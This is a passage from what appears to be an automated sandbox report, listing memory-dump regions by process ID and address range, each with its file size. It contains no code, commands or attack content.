                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/304-154-0x00000000069C0000-0x0000000006C03000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/304-153-0x0000000000B00000-0x0000000000FC7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/304-17-0x0000000000B00000-0x0000000000FC7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/304-157-0x0000000000B00000-0x0000000000FC7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/304-584-0x0000000006B20000-0x0000000008528000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/304-194-0x0000000000B00000-0x0000000000FC7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/316-97-0x0000000001290000-0x00000000012E2000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/464-1236-0x0000000000D10000-0x0000000002718000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/464-1235-0x0000000000D10000-0x0000000002718000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/884-286-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-430-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-296-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-299-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-300-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-292-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-288-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-290-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/884-294-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/1032-298-0x0000000000400000-0x000000000081B000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.1MB

                                                                                                                                                                                                                    • memory/1056-95-0x0000000000A80000-0x0000000000B22000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      648KB

                                                                                                                                                                                                                    • memory/1180-378-0x0000000001010000-0x00000000010BE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                    • memory/1292-557-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                    • memory/1496-281-0x00000000010D0000-0x0000000001150000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      512KB

                                                                                                                                                                                                                    • memory/1548-569-0x0000000000A50000-0x00000000010FC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/1548-532-0x0000000001100000-0x00000000017AC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/1548-533-0x0000000000A50000-0x00000000010FC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/1548-531-0x0000000001100000-0x00000000017AC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/1548-530-0x0000000001100000-0x00000000017AC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/1548-545-0x0000000010000000-0x00000000106AC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/1548-566-0x0000000001100000-0x00000000017AC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/1628-461-0x0000000000E60000-0x0000000000EB4000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      336KB

                                                                                                                                                                                                                    • memory/1788-2070-0x0000000000E30000-0x0000000002838000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/2064-195-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      972KB

                                                                                                                                                                                                                    • memory/2064-309-0x0000000000D30000-0x0000000000F73000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/2064-156-0x0000000000D30000-0x0000000000F73000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                    • memory/2284-463-0x00000000005E0000-0x00000000005FA000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                    • memory/2284-346-0x00000000009D0000-0x0000000000A48000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      480KB

                                                                                                                                                                                                                    • memory/2500-43-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2500-41-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2500-39-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2500-50-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2500-49-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2500-48-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2500-47-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2500-45-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2508-36-0x00000000003C0000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      336KB

                                                                                                                                                                                                                    • memory/2648-585-0x0000000000E60000-0x0000000002868000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/2648-586-0x0000000000E60000-0x0000000002868000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/2696-529-0x00000000023E0000-0x0000000002A8C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/2696-565-0x00000000023E0000-0x0000000002A8C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                    • memory/2744-316-0x0000000000AB0000-0x0000000000B02000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2868-16-0x0000000000220000-0x00000000006E7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/2868-15-0x0000000000220000-0x00000000006E7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/2868-5-0x0000000000220000-0x00000000006E7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/2868-3-0x0000000000220000-0x00000000006E7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/2868-2-0x0000000000221000-0x000000000024F000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      184KB

                                                                                                                                                                                                                    • memory/2868-1-0x0000000077530000-0x0000000077532000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                    • memory/2868-0-0x0000000000220000-0x00000000006E7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                    • memory/2888-475-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2888-472-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2888-474-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2888-476-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2888-477-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2888-469-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2888-470-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      328KB

                                                                                                                                                                                                                    • memory/2972-561-0x0000000000400000-0x0000000001071000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      12.4MB

                                                                                                                                                                                                                    • memory/3036-1364-0x0000000000D10000-0x0000000002718000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/3328-2025-0x0000000000E30000-0x0000000002838000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      26.0MB

                                                                                                                                                                                                                    • memory/3544-1323-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.9MB

                                                                                                                                                                                                                    • memory/3544-1324-0x00000000022C0000-0x00000000022C8000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/3632-1303-0x0000000001F70000-0x0000000001F78000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/3632-1302-0x000000001B7A0000-0x000000001BA82000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.9MB